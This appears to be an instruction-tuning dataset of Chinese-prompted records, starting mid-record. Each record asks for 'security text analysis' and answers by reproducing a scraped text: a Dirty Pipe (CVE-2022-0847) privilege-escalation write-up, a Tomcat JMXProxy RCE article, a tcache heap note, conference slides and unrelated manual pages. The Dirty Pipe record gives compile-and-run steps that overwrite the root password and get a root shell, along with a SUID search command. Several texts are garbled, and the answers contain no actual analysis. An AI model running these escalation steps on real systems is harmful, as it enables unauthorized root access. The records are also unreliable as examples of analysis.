PIP101 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: CVE-2022-0847 --- <center><h1>CVE-2022-0847</h1><b>本文作者一生热爱</b><br><br></center> --- ## 一简述 CVE-2022-0847-DirtyPipe-Exploit 是存在于 Linux 内核 5.8 及之后版本中的本地提权漏洞 攻击者通过利用此漏洞可覆盖重写任意可读文件中的数据从而可将普通权限的用户提升到特权 root CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞Dirty Cow但它更容易被利用漏洞作者将此漏洞命名为 `Dirty Pipe` ## 二影响版本 高于 5.8 的 Linux 内核版本会受到影响 到目前为止该漏洞已在以下 Linux 内核版本中修复 - 5.16.11 - 5.15.25 - 5.10.102 ## 三漏洞利用 代码链接[https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits.git) 在 Ubuntu 20.04.25.8.0-43利用成功 ```bash sudo apt-get install gcc chmod +x compile.sh ./compile.sh ``` ### 1修改/覆盖只读文件提权 `exploit-1.c` 漏洞可用于修改或覆盖任意只读文件 漏洞利用代码已配置为用管道密码替换 root 密码并将备份 /tmp/passwd.bak 下的 /etc/passwd 文件 此外该漏洞利用还将为您提供提升的 root shell并在完成后恢复原始 passwd 文件 ```bash ./exploit-1 ``` <img width=\"1000\" src=\"/img/Snipaste_2022-07-07_20-52-24.png\"> ### 2劫持 SUID 二进制文件提权 以 root 身份运行的只读 SUID 进程内存中注入和覆盖数据 查找SUID二进制文件 ```bash find / -perm -4000 2>/dev/null ``` 运行利用程序 <img width=\"800\" src=\"/img/Snipaste_2022-07-07_20-54-36.png\"> <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年7月7日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nunalias === 删除由alias设置的别名 ## 概要 ```shell unalias [-a] name [name ...] ``` ## 主要用途 - 删除一个或多个别名 - 删除全部已定义的别名 ## 选项 ```shell -a删除全部已定义的别名 ``` ## 参数 name指定要删除的一个或多个已定义的别名 ### 返回值 unalias返回true除非您要删除的别名未定义 ## 例子 ```shell # 删除全部已定义的别名 unalias -a # 删除已定义的别名假设当前环境存在以下别名 unalias vi unalias ls grep ``` ## 错误用法 - 要删除的别名未定义 - 不使用-a选项时没有传递name参数 ### 注意 1. **执行脚本时请注意** > 使用`source`命令执行的bash脚本如果执行了`alias`或`unalias`命令那么有可能会对终端环境的别名设置产生影响终端环境的别名设置也可能改变运行结果 > > 通过`sh`方式调用的bash脚本或直接运行当前用户有执行权限的脚本不受终端环境的别名影响 2. 查看及设置别名请查看`alias`命令 3. 该命令是bash内建命令相关的帮助信息请查看`help`命令", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nhttp:// toool us Lockpicking Next Lesson 3:30 http:// .us . http:// toool us Is Everyone Ready to Learn? http:// toool us Is Everyone Ready to Learn About Lockpicking? http:// toool us Lockpicking is Fun, Fun, Fun! http:// toool us First, a word about rules Yes, we have rules. J 1. Do not pick someone elses locks. 2. Do not pick your locks if you rely on them. http:// toool us The Three Kinds of Lock-Opening http:// toool us The Three Kinds of Lock-Opening 1. Lockpicking  what we do TOOOL provides the knowledge and the means  what spies do TOOOL provides neither knowledge nor means http:// toool us The Three Kinds of Lock-Opening 1. Lockpicking  what we do TOOOL provides the knowledge and the means 2. Quick & Dirty what spies do TOOOL provides neither knowledge nor means http:// toool us The Three Kinds of Lock-Opening 1. Lockpicking  what we do TOOOL provides the knowledge and the means 2. Quick & Dirty  what criminals do TOOOL provides knowledge. . . but no means 3. Covert & High-Tech  what spies do TOOOL provides neither knowledge nor means http:// toool us The Three Kinds of Lock-Opening 1. Lockpicking  what we do TOOOL provides the knowledge and the means 2. Quick & Dirty  what criminals do TOOOL provides knowledge. . . but no means 3. Covert & High-Tech  what spies do TOOOL provides neither knowledge nor means http:// toool us The Three Kinds of Lock-Opening 1. Lockpicking  what we do TOOOL provides the knowledge and the means 2. Quick & Dirty  what criminals do TOOOL provides knowledge. . . but no means 3. Covert & High-Tech  what spies do TOOOL provides neither knowledge nor means http:// toool us The Three Kinds of Lock-Opening 1. Lockpicking  what we do TOOOL provides the knowledge and the means 2. Quick & Dirty  what criminals do TOOOL provides knowledge. . . but no means 3. Covert & High-Tech  what spies do TOOOL provides neither knowledge nor means http:// toool us The Three Kinds of Lock-Opening 1. Lockpicking  what we do TOOOL provides the knowledge a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTomcat JMXProxy RCE 0x00 前言 在介绍该漏洞之前有必要先进行一些说明 1不影响默认配置的 Tomcat 2不影响 SpringBoot 只影响通过 war 部署的项目 3该漏洞为利用链中的一环配合第三方平台未授权访问或弱口令可以直接利用 既然官方不认那我直接公开了 0x01 Manager Tomcat 一直存在一个不是漏洞的漏洞 Tomcat Manager 导致上传 war 解压生成 webshell 的 RCE 在 tomcat/conf/tomcat-users.xml 配置 访问 /manager/html 输入用户名和密码即可在里面上传 war 进行部署 <user username=\"admin\" password=\"<must-be-changed>\" roles=\"manager-gui\"/> 显然这不归 Tomcat 负责应该由用户保证自己的账号和密码安全 Tomcat 对于 Manager 的管理页面采用了 HTTP Basic 认证也就是用户名密码拼接后 Base64 编码 如果想要暴力破解这个身份认证其实是不太可能的因为 Tomcat 已经考虑到这个问题参考 LockOutRealm 类的代码默认在输入错误5次后会锁定5分钟这也是 Tomcat 官方拒绝该漏洞的原因 之一他们认为基于 JMXProxy 实现的 RCE 攻击和这个类似由用户负责安全 其实值得关心的是 Tomcat 并不仅仅支持管理页面同时支持 API 和 JMXProxy 如果 API 可以未授权访问也会导致严重的安全问题 使用 API 的方式是 http://{host}:{port}/manager/text/{command}?{parameters} 使用 API 部署 WAR 包 如何使用 JMXProxy 做到 RCE 是本文的重点内容 public class LockOutRealm extends CombinedRealm { /** * The number of times in a row a user has to fail authentication to be * locked out. Defaults to 5. */ protected int failureCount = 5; /** * The time (in seconds) a user is locked out for after too many * authentication failures. Defaults to 300 (5 minutes). */ protected int lockOutTime = 300; } http://localhost:8080/manager/text/deploy?path=/footoo&war=file:/path/to/foo 0x02 JMX JMX 与 Tomcat 无关在 Java 官方文档对于 JMX 的定义如下 JMX( Java Management Extensions )是一个为应用程序植入管理功能的框架 JMX 是一套标准的代理 和服务实际上用户可以在任何 Java 应用程序中使用这些代理和服务实现管理 用人话来说 JMX 让程序有被管理的功能例如某 Web 网站是在24小时不间断运行那么对网站进行监 控是必要的功能又或者在业务高峰的期间想对接口进行限流就必须去修改接口并发的配置值 借用网上博客一张图一般 JMX 会通过 Adapter 实现 Web 管理页面例如 Zabbix 和 Nagios 等工具对 于 JVM 的监控实现老一些的平台比如 JDMK 和 MX4J 等 结合实例来讲我搭建了一个 MX4J 的监控平台 进入其中的 ClassLoading 属性观察监控到类的属性并且部分值可以在运行时进行修改   jconsole   Web                     JVM       Connector Adaptor         MBeanServer       MBean1MBean2MBean3                    在网上进行搜索可以发现大量类似的 JMX 管理页面我们可以实时地修改 JVM 内部的一些属性 但这种修改大多数情况下是无意义的顶多由于某些属性为空通过空指针导致拒绝服务这样的鸡肋洞 因此研究如何通过 JMX 修改变量以实现 RCE 是比较有意义的研究 0x03 JMXProxy 接下来是本文的重点在 Tomcat Manager 中还有一种特殊的管理 JMX Proxy Servlet 参考 Tomcat 9.0 官方文档 中的描述翻译后为 JMX Proxy Servlet", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecure&Because&Math:&A&Deep1Dive&on& Machine&Learning1Based&Monitoring& (#SecureBecauseMath)& Alex%Pinto% Chief%Data%Scien2st%|%MLSec%Project%% @alexcpsec% @MLSecProject! Alex%Pinto%  Chief%Data%Scien2st%at%MLSec%Project%  Machine%Learning%Researcher%and%Trainer%  Network%security%and%incident%response%aficionado%%  Tortured%by%SIEMs%as%a%child%  Hacker%Spirit%Animal:%CAFFEINATED%CAPYBARA! whoami& (hPps://secure.flickr.com/photos/kobashi_san/)% %  Security%Singularity%  Some%History%  TLA%  ML%Marke2ng%PaPerns%  Anomaly%Detec2on%  Classifica2on%  Buyers%Guide%  MLSec%Project% Agenda& Security&Singularity&Approaches& (Side&Note)& First%hit%on%Google%images%for%Network%Security%Solved%is%a% picture%of%Jack%Daniel! Security&Singularity&Approaches&  Machine%learning%/%math%/%algorithms%these%terms%are% used%interchangeably%quite%frequently.%  Is%behavioral%baselining%and%anomaly%detec2on%part%of% this?%  What%about%Big%Data%Security%Analy2cs?% % (hPp://bigdatapix.tumblr.com/)% Are&we&even&trying?&  Hyper`dimensional%security% analy2cs%  3rd%genera2on%Ar2ficial% Intelligence%  Secure%because%Math% %  Lack%of%ability%to%differen2ate% hurts%buyers,%investors.%  Are%we%even%funding%the%right% things?% Is&this&a&communicaCon&issue?& Guess&the&Year!&  ()%behavior%analysis%system%that%enhances%your% network%intelligence%and%security%by%audi2ng%network% flow%data%from%exis2ng%infrastructure%devices%  \"Mathema2cal%models%()%that%determine%baseline% behavior%across%users%and%machines,%detec2ng%(...)% anomalous%and%risky%ac2vi2es%(...)%  ()%maintains%historical%profiles%of%usage%per%user%and% raises%an%alarm%when%observed%ac2vity%departs%from% established%paPerns%of%usage%for%an%individual.%% A&liGle&history&  Dorothy%E.%Denning%(professor%at%the% Department%of%Defense%Analysis%at%the% Naval%Postgraduate%School)%  1986%(SRI)%`%First%research%that%led% to%IDS%  Intrusion%Detec2on%Expert%System% (IDES)%  Already%had%sta2s2cal%anomaly% detec2on%built`in%  1993:%Her%colleagues%release%the%Ne", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGadgetInspector源码分析 前置废话 我不想搞介绍就这样吧写这个主要是上的对我很晦涩很多别觉得简单的我不会 包括些汇编指令等当然本篇也是站在很多前辈的肩膀上进学习属实是少花了很多功 夫 在分析gadgetinspector源码的时候概会对各个核类讲解并简单分析ASM部分btw本 篇基于jdk8进分析 当然既然是学习那么我们肯定是需要跟踪代码的GI这款具属实头疼本不仅引 了jdk的些依赖如rt.jar在调试的过程当中也出现了gadgetinspector当中的类属实不适合学 习时使为了解决这个问题我 在 gadgetinspector.ClassResourceEnumerator#getAllClasses 当中将源码修改如 此这样我便能写代码逻辑并展开学习我个认为化繁为简也是个很重要的过 程如下我剔除了jdk原本的类并且要求全类名包含特定字符因此解决了这个问题当然 在具体使的时候还是要替换回来 可以看到经过简单的优化过程也更加清晰但是在后有些地需要改回来不然得不到正 确结果这是为了分析所以暂时改下 在学习的时候配合反汇编代码会更容易理解Java也带了查看的法 javap -c 类名 lol多逼逼句定要在熟悉jvm stack和本地变量表不然很多逻辑会是懵的 ASM部分 这部分不建议直接看建议在后看到具体部分再来看看 public Collection<ClassResource> getAllClasses() throws IOException { // Collection<ClassResource> result = new ArrayList<> (getRuntimeClasses()); Collection<ClassResource> result = new ArrayList<>(); if (ConfigHelper.onlyJDK) return result; for (ClassPath.ClassInfo classInfo : ClassPath.from(classLoader).getAllClasses()) { if (classInfo.getName().contains(\"yyds\")){ result.add(new ClassLoaderClassResource(classLoader, classInfo.getResourceName())); } } return result; } 模拟JVM栈帧变化 这部分很重要如果搞不明后在看GI代码的时候会很懵逼 在程序运的过程中每个线程都对应个属于的JVM Stack当个新线程开始时会 在内存上分配个属于的JVM Stack当该线程执结束后相应的JVM Stack内存空间 也就被回收了 在JVM Stack当中是栈的结构存储的是frames每个frame空间可以称之为Stack Frame当调个新法的时候就会在JVM Stack上分配个frame空间当法退出时 相应的frame空间也会JVM Stack上进清除掉出栈操作在frame空间当中有两个重要 的结构即local variables个索引从0开始的数组和operand stack栈的结构对于每 个法来说它都是在的Stack Frame上来运的在编译的时候就决定了local variables和operand stack的 这特别要注意在法刚开始的时候operand stack是空不需要存储任何的数据local variables的初始状态则需要考虑三个因素 当前法是否为static法如果当前法是non-static法则需要在local variables索引为 0的位置存在个this变量如果当前法是static法则不需要存储this 当前法是否接收参数法接收的参数会按照参数的声明顺序放到local variables当 中 法参数是否包含long或double类型如果法的参数是long或double类型那么它在local variables当中占两个位置 这推荐个IDEA的插件 ASM Bytecode Viewer 可以很便配合学习理解同时如果需 要查当中的汇编指令的含义也很简单去官看看就好https://docs.oracle.com/javase/specs/jvms /se15/html/jvms-6.html ClassVisitor 我们只要知道在ClassVisitor类当中定义的visitXxx()法中的参数与ClassFile结构密切相关就 很关键了 先看看的字段 ClassVisitor当中许多的visitXxx()法这些visitXxx()法与 ClassFile 的结构密切相关 这下四个才是我们关注的主体 public abst", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHome Insecurity: No Alarms, False Alarms, and SIGINT Logan Lamb lamblm@ornl.gov ABSTRACT The market share of home security systems has substan- tially increased as vendors incorporate more desirable fea- tures: intrusion detection, automation, wireless, and LCD touch panel controls. Wireless connectivity allows vendors to manufacture cheaper, more featureful products that re- quire little to no home modification to install. Consumer win, since adding devices is easier. The result: an osten- sibly more secure, convenient, and connected home for a larger number of citizens. Sadly, this hypothesis is flawed; the idea of covering a home with more security sensors does not translate into a more secure home. Additionally, the number of homes using these vulnerable systems is large, and the growth rate is increasing producing a even larger problem. In this paper, we will demonstrate a generalized approach for compromising three systems: ADT, the largest home security dealer in North America; Honeywell, one of the largest manufacturers of security devices; and Vivint, a top 5 security dealer. We will suppress alarms, create false alarms, and collect artifacts that facilitate tracking the movements of individuals in their homes. 1. INTRODUCTION Home security systems have advanced tremendously in the past 25 years. They have evolved from simple systems com- posed of wired sensors, keypads, and control panels to a central hub for all home security and automation needs. Newer home security systems have incorporated most every advancement in consumer electronics to make more feature- ful systems including touchscreens, two-way communication, wireless sensors, and wireless home automation. Some can even be controlled from a smartphone.. This rapid incorpo- ration of new technology to create innovative features not only increases the attack surface of the system, but also reduces the resources expended on the upkeep of legacy fea- tures. Because of this trade-o, allocating more reso", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Half a Sheep is Better Than None A great deal of the pleasure of reading Project Halfsheep: or How the Agencys Alien Got High by Susan Hasler comes from reading the novel on several levels. One level is the story of an alien from the planet Utorb who crash lands on earth and falls into the hands of the American military and the CIA shortly after World War 2. A second level is a view through a window of irony into the culture of the CIA in its green and cowboy days, when fear of Communists was at its highest and justified doing almost anything on behalf of the free world. That anything included experiments with unwitting and unsuspecting subjects, often administering drugs to the unwary, as the CIA did for example in houses of prostitution in San Francisco and New York, so the effects could be observed. Humor and the aliens unique point of view ameliorates to a degree the more horrific effects of those experiments. Like looking at the head of Medusa in a mirror, reality is made bearable. A third level is the braiding of several themes which suggest some of the authors biography, giving us a template of how a CIA veteran of many years of hand-to-hand combat with genuine enemies of the nation, the culture of the agency, men who were contemptuous and abusive of women, and the politics of careerism and expediency  how she managed to manage all that. The authors humanity, values, and commitments, which must have evolved through years at the agency, permeate those threads and, I suggest, culminate in the choices made by the alien. The frustration that comes with that hand-to-hand combat takes a toll. If consequences are unacknowledged, a person can wind up bent, but when the emotions are felt and owned, they can be channeled into narratives like this one, translated into literary artfulness, that is, that serves a higher purpose, and translated as well into an enjoyable story that masquerades as a science fiction/spy novel but is so much more. As one of the characters in", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH \"CREATEDB\" \"1\" \"2003-11-02\" \"Application\" \"PostgreSQL Client Applications\" .SH NAME createdb \\- 创建一个新的 PostgreSQL 数据库 .SH SYNOPSIS .sp \\fBcreatedb\\fR\\fR [ \\fR\\fB\\fIoption\\fB\\fR...\\fB \\fR\\fR]\\fR\\fR [ \\fR\\fB\\fIdbname\\fB \\fR\\fR]\\fR\\fR [ \\fR\\fB\\fIdescription\\fB \\fR\\fR]\\fR .SH \"DESCRIPTION 描述\" .PP \\fBcreatedb\\fR 创建一个新的 PostgreSQL 数据库 .PP 通常执行这个命令的数据库用户成为新数据库的所有者 不过如果执行用户拥有合适的权限那么他可以通过 \\fB\\-O\\fP 指定合适的用户 .PP \\fBcreatedb\\fR 是一个 SQL 命令 CREATE DATABASE [\\fBcreate_database\\fR(7)] 的封装 因此用哪种方法创建数据库都没什么特别的 .SH \"OPTIONS 选项\" .PP \\fBcreatedb\\fR 接受下列命令行参数 .TP \\fB\\fIdbname\\fB\\fR 声明要创建的数据库名该名称应该在本节点的 PostgreSQL 所有数据库里面是唯一的 缺省是与当前系统用户同名 .TP \\fB\\fIdescription\\fB\\fR 这个选项声明一个与新创建的数据库相关的注解 .TP \\fB-D \\fIlocation\\fB\\fR .TP \\fB--location \\fIlocation\\fB\\fR 声明变更了的数据库集群节点的位置 又见 \\fBinitlocation\\fR(1). .TP \\fB-e\\fR .TP \\fB--echo\\fR 回显 createdb 生成的命令并且把它发送到服务器 .TP \\fB-E \\fIencoding\\fB\\fR .TP \\fB--encoding \\fIencoding\\fB\\fR 声明用于此数据库的字符编码方式 .TP \\fB-O \\fIowner\\fB\\fR .TP \\fB--owner \\fIowner\\fB\\fR 指定将拥有新数据库的数据库用户 .TP \\fB-q\\fR .TP \\fB--quiet\\fR 不显示响应 .TP \\fB-T \\fItemplate\\fB\\fR .TP \\fB--template \\fItemplate\\fB\\fR 声明创建此数据库的模板数据库 .PP .PP 选项 -h-p-U -W-e 是以文本形式传递给 psql 选项\\fB-O\\fR\\fB-D\\fR\\fB-T\\fR 和 \\fB-E\\fR 转换为下层的 SQL 命令 CREATE DATABASE [\\fBcreate_database\\fR(7)] 的选项参考该条目获取更多相关信息 .PP \\fBcreatedb\\fR 还接受下列命令行参数作为连接参数 .TP \\fB-h \\fIhost\\fB\\fR .TP \\fB--host \\fIhost\\fB\\fR 声明运行服务器的主机名 如果数值以斜扛开头则它被用做到 Unix 域套接字的路径 .TP \\fB-p \\fIport\\fB\\fR .TP \\fB--port \\fIport\\fB\\fR 声明服务器 侦听的等待连接的互联网 TCP 端口或一个本地 Unix 域套接字文件扩展描述符 .TP \\fB-U \\fIusername\\fB\\fR .TP \\fB--username \\fIusername\\fB\\fR 进行联接的用户名 .TP \\fB-W\\fR .TP \\fB--password\\fR 强制口令提示符 .PP .SH \"ENVIRONMENT 环境\" .TP \\fBPGDATABASE\\fR 如果设置了那么就是要创建的数据库名字除非在命令行上覆盖了 .TP \\fBPGHOST\\fR .TP \\fBPGPORT\\fR .TP \\fBPGUSER\\fR 缺省连接参数PGUSER 还决定了要创建的数据库名字 如果我们没有在命令行上声明数据库名字也没有用 \\fBPGDATABASE\\fR 声明的话 .SH \"DIAGNOSTICS 诊断\" .PP 如果出现错误将会显示后端错误信息参阅 CREATE DATABASE [\\fBcreate_database\\fR(7)] 和 \\fBpsql\\fR(1) 获取可能信息描述 数据库服务器必须在目标服务器上运行同样前端库 libpq 使用的缺省连接设置和环境变量都将适用 .SH \"EXAMPLES 例子\" .PP 用缺省数据库服务器创建一个数据库 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### The introduction of Tcache overview 在 tcache 中新增了两个结构体分别是 tcache_entry 和 tcache_perthread_struct ```C /* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache. */ typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry; /* There is one of these for each thread, which contains the per-thread cache (hence \"tcache_perthread_struct\"). Keeping overall size low is mildly important. Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons. */ typedef struct tcache_perthread_struct { char counts[TCACHE_MAX_BINS]; tcache_entry *entries[TCACHE_MAX_BINS]; } tcache_perthread_struct; static __thread tcache_perthread_struct *tcache = NULL; ``` 其中有两个重要的函数 `tcache_get()` 和 `tcache_put()`: ```C static void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); assert (tc_idx < TCACHE_MAX_BINS); e->next = tcache->entries[tc_idx]; tcache->entries[tc_idx] = e; ++(tcache->counts[tc_idx]); } static void * tcache_get (size_t tc_idx) { tcache_entry *e = tcache->entries[tc_idx]; assert (tc_idx < TCACHE_MAX_BINS); assert (tcache->entries[tc_idx] > 0); tcache->entries[tc_idx] = e->next; --(tcache->counts[tc_idx]); return (void *) e; } ``` 这两个函数会在函数 [_int_free](https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l4173) 和 [__libc_malloc](https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=blob;f=malloc/malloc.c;h=2527e2504761744df2bdb1abdc02d936ff907ad2;hb=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc#l3051) 的开头被调用其中 `tcache_put` 当所请求的分配大小不大于`0x408`并且当给定大小的 tcache bin 未满时调用一个tcache bin中的最大块数`mp_.tcache_count`是`7` ```c /* This is another arbitrary limit, which tunables can change. Each tcache bin will hold at most this number of chunks. */ # define TCACHE_FILL_COUNT 7 #endif ``` 再复习一遍 `tcache_get()` ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHow to Train Your RFID Tools Craig Young Security Researcher @ Tripwire VERT About Craig Security Researcher in Tripwire VERT Author of IP360 content and original research Identified 100+ CVEs over 2013 & 2014 Won 1st SOHOpelessly Broken @ DC22 using 10 0-days Research Objectives Shed light on the tools for reading, cloning, & emulating Provide tutorial-like examples for firmware hacking Explore practical attacks enhanced by 3D printing Design antenna around 3D printed form Identify uses of paired embedded kits Roadmap Tool Intros 3D Printing 101  Caveats RFID Basics  Tips & Tricks Firmware Hacking  Adding to Proxmark 3D Printing Usage  Antenna Design  Concealing Devices Q & A Tool Intros CubePro 3D Printer NFC USB (PN533) RFIDler v22 Proxmark3 Raspberry Pi USB Armory Tools CubePro 3D Printer NFC USB (PN533) RFIDler v22 Proxmark3 Raspberry Pi USB Armory RFID Tools CubePro 3D Printer NFC USB (PN533) RFIDler v22 Proxmark3 Raspberry Pi USB Armory Computing Tools CubePro 3D Printer NFC USB (PN533) RFIDler v22 Proxmark3 Raspberry Pi USB Armory Fabrication Proxmark3 Intro Adopted from Gerhard de Koning Gans thesis Koning Gans was analyzing Mifare transit cards This system combines cheap FPGA and ARM CPU Completely open source HW and SW Low & High Frequency support The Proxmark3 FPGA Xilinx Spartan-II Field-Programmable Gate Array Written in Verilog for ISE WebPACK Serial Peripheral Interface (SPI) Coil driver Analogue/Digital Converters Synchronous Serial Port to CPU Module based design Modes specify module connections Proxmark3 CPU ATMEL 32-bit RISC Processor (AT91SAM7Sxx Series) Coded in C Receives data from FPGA Encoding/decoding of bitstream Handle USB data link All high level functions run here Proxmark3 ADC TI TLC 5540 analog-to-digital converter (ADC) 8-bit resolution 40 Megasamples/sec (MSPS) Analog input from coil 8-pin output to FPGA Control via SPI Proxmark3 Connectors Mini-USB Provides Power Data connection via USB-Serial Hirose Connector Connection to antenna c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHAM FOR HACKERS TAKE BACK THE AIRWAVES JonM  DEFCON 16 JonM  Licensed Amateur Extrathe highest class of license in the US  Operating since 2000  Radio is just one of my hobbiessoftware security consulting is the most lucrative You want to play with wireless  Remote control  Data links  Personal communication  Telemetry So what are your options? US Frequency Allocation None if it is free for general use Listening is unrestricted Aside from some asinine restrictions on analog cell phone frequencies, you can listen to whatever you like all day long. So what can you use?  FCC Part 95: Personal Radio Services  CB and FRS  Low power, short range (couple of miles), voice only  Small number of channels  FCC Part 15: Unlicensed RF Devices  WiFi, garage door openers, cordless phones, etc  Limited power  Antenna restrictions  A number of frequencies available, but lots of users Long story short  Unlicensed operations are restricted  Youre not going to get much range  Youre going to have a lot of competition  If theres interference, you have to take it  If youre interfering with someone else, you have to shut down your transmitter Enter amateur radio  FCC Part 97: Amateur Radio Service  Upsides:  You get to use a lot more power  You have primary use on a number of bands  Downsides:  You have to be licensed  You have to follow operating procedures Created for Hackers The FCCs stated principles for amateur radio include: Continuation and extension of the amateur's proven ability to contribute to the advancement of the radio art. Amateur radio was created to provide skilled individuals with a forum for experimentation and technical advancement. Amateur Radio Limitations  With great power comes great responsibility:  You have to identify yourself  No secrecy, no encryption  You cant broadcast, especially not music  Non-pecuniarynon-commercial use only Oh, one more thing You cant swear. Seriously. Licensing  Three levels of license: Technician, General, Extra  If you just want to ex", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSean Kanuck DEF CON 25 Hacking Democracy : A Socratic Dialogue How do you know if your vote was recorded correctly Which is more important to you : secrecy or verification How much error is too much for legitimacy Were you on the right list Were you in the right place Does the process impact you more than others Who decides what becomes news Which runner is in the lead Is the playing field made of natural or artificial turf How much free speech is too much Can foreign guests join the party Is this an invitation to a masquerade ball Which innocent victims deserve protection Are they required to accept help . . . from their opponent Is any of this actually new at all Can two rights make a wrong", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCATCHING MALWARE EN MASSE : DNS & IP STYLE Dhia Mahjoub @DhiaLite dhia@opendns.com Thibault Reuille @ThibaultReuille thibault@opendns.com Andree Toonk @atoonk andree@opendns.com DHIA MAHJOUB 2  Senior Security Researcher at OpenDNS  PhD graph theory applied on sensor networks  Security, graphs, data analysis  @DhiaLite THIBAULT REUILLE 3  Security Researcher at OpenDNS  Former SoGware Engineer @ NVIDIA  Security and VisualizaLon ?  @ThibaultReuille ANDREE TOONK 4  Manager of Network Engineering at OpenDNS  Founder and lead of BGPMon.net  @atoonk Agenda OpenDNS presentaLon Catching Malware DNS Style Catching Malware IP style 3D Data VisualizaLon Conclusion OpenDNS' Network Map STUB CLIENTS RECURSIVE NAME SERVERS AUTHORITATIVE NAME SERVERS root tld domain.tld DNS Traffic Catching Malware DNS style Crimeware Ecosystem DNS style Crimeware Ecosystem DNS style InvesNgaNon Process Zbot fast flux proxy network Track CnCs w/ hadoop Track CnCs w/ streaming DNS IdenLfy malware phoning to CnCs Pony panel on proxy network Stats about domains, clients and samples DNS style Fast Flux Networks  DNS-based redundancy/evasion technique  Fast flux domain resolves to many IPs, many ASNs, many CCs, relaLvely low TTL  Fast flux domain resolves to 1 IP with TTL=0  Ex : Trojan CnCs, spam, scam, pharmacy, daLng domains DNS style Fast Flux Proxy Networks (ex: Zbot) CnCs Targets Kelihos TTL = 0 Zbot TTL = 150 DNS style Zeus Crimeware (1/2) DNS style ConfiguraLon file Web injects Zeus builder Binary file Zeus Crimeware (2/2) DNS style Control panel Zeus Timeline DNS style Zeus CnCs Compromised Sites Bulletproof HosLng Fast Flux Botnet DNS style Zeus CnC URLs ConfiguraLon Files Binary Files Drop Zones DNS style Zeus CnC detecNon Methods 1) Periodic batch pig job (Hadoop script) 2) IP harvesLng + streaming authoritaNve DNS + filtering heurisLcs DNS style DetecNon with Hadoop  Periodic Pig job extracts domains with TTL = 150  Build domain to IP biparNte graph  Extract largest connected component  IdenLfy ne", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLost in Translation C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah Lost in Translation: Translation-based Steganography Christian Grothoff, Krista Grothoff, Ludmila Alkhutova, Ryan Stutsman and Mikhail Atallah {christian,krista}@grothoff.org, {lalkhuto,rstutsma}@purdue.edu, mja@cs.purdue.edu ... because as we know, there are known knowns; there are things we know we know. We also know there are known unknowns; that is to say we know there are some things we do not know. But there are also unknown unknowns  the ones we dont know we dont know. http://www.cs.purdue.edu/homes/rstutsma/stego/ 1 Lost in Translation C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah Some Approaches to Linguistic Stego  Wayner 92: Chapman & Davida 97: handgenerated CFGs, automatically generated syntactic templates to produce syntactically correct text  Chapman, Davida & Rennhard 01: Synonym replacement using existing texts http://www.cs.purdue.edu/homes/rstutsma/stego/ 2 Lost in Translation C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah Some Disadvantages to these Approaches  Hand-generation of grammars labor intensive (solved with automatic template generation)  semantic coherence can be problematic (CFGs)  Not all synonyms are created equal (e.g. eat vs. devour); good lists must be hand-generated (NICETEXT II)  Additionally, pure semantic substitution may be subject to known-cover and diff attacks (NICETEXT II) http://www.cs.purdue.edu/homes/rstutsma/stego/ 3 Lost in Translation C. Grothoff, K. Grothoff, L. Alkhutova, R. Stutsman, M. Atallah Why do these problems arise?  Automatic generation of semantically and rhetorically correct text is difficult on its own  Each of these approaches attempts to mimic correct text  Incorrect text becomes a source of deviation from the statistical profile of what is mimicked ... hide the identity of a text by recoding a file so its statistical profile approximates the statistical profile of another file.  Peter Wayner http://", "category": "text_analysis", "source": "security_papers"}
